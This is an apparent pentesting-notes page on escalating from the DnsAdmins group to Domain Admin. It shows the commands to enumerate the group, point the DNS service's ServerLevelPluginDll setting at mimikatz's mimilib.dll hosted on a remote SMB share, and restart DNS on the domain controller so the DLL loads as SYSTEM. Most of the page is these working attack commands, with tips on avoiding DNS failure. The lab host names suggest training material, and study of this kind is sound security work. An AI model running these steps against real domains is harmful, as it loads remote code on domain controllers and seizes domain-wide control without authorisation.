DNS Admins

General

Members of the DNS Admins group can load arbitrary DLL's with the privileges of dns.exe (SYSTEM)
If the DC serves as DNS server, we can escalate to DA
But: need to be able to restart the DNS on the DC

Exploitation

Can use mimilib.dll from mimikatz
Modify kdns.c or use boiler plate from
mimilib.dll logs all DNS queries to C:\Windows\System32\kiwidns.log by default
Host DLL on SMB server with anonymous access
Be careful, else DNS might fail -> noisy!

# Enumerate members of DNSAdmins group
# Using PowerView 3.0
Get-DomainGroupMember "DNSAdmins"

# Using AD Module
Get-ADGroupMember -Identity "DNSAdmins"

# With privileges of DNSAdmins member, e.g. through PTH, configure DLL
# Using dnscmd.exe (needs RSAT DNS)
dnscmd dcorp-dc /config /serverlevelplugindll \\172.16.72.100\dll\mimilib.dll

# Using DNSServer module (needds RSAT DNS)
$dnsettings = Get-DNSServerSetting -ComputerName dcorp-dc -Verbose -All
$dnsettings.ServerLevelPluginDll = "\\172.16.72.100\dll\mimilib.dll"
Set-DnsServerSetting -InputObject $dnsettings -ComputerName dcorp-dc -Verbose

# Restart DNS service
sc \\dcorp-dc stop dns
sc \\dcorp-dc start dns

PreviousUnconstrained Delegation NextLateral Movement

Last updated 2 years ago